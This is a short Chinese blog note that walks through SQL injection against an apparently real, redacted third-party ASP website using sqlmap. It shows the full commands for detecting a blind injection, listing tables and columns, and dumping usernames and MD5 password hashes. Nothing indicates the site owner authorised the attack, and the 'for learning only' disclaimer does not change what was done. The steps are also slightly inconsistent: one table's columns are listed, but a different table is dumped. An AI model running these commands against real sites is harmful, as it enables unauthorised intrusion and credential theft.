sqlmap相关
写在前面:对于某网http://www.xxxx.com/xxxxx.asp?id=11,我采取了sqlmap和啊D两个工具一起来进行sql注入。当然是只作为学习sqlmap和总结语句用,仅供参考,我们要富强、民主、文明、和谐,自由、平等、公正、法治,爱国、敬业、诚信、友善
-
啊D
-
Sqlmap:
检查注入点是否存在:
sqlmap.py -u "http://www.xxxxx.com/xxxxx.asp?id=11"
可得存在boolean-based blind注入,注入参数id为GET注入,web服务器系统为windows2003 or xp,web应用程序技术为ASP.NET, Microsoft IIS 6.0,数据库类型为Microsoft Access
爆库,发现没有,接下来直接爆表sqlmap.py -u "http://www.xxxx.com/xxxxx.asp?id=11" —tables
-
选择user表来爆字段
sqlmap.py -u "http://www.xxxx.com/xxxx.asp?id=11" -T user --columns
选择id,name和passwords来爆内容
sqlmap.py -u "http://www.xxxxxx.com/xxxx.asp?id=11" -T admin -C "id,name,pass" --dump
得到用户名和密码(MD5加密)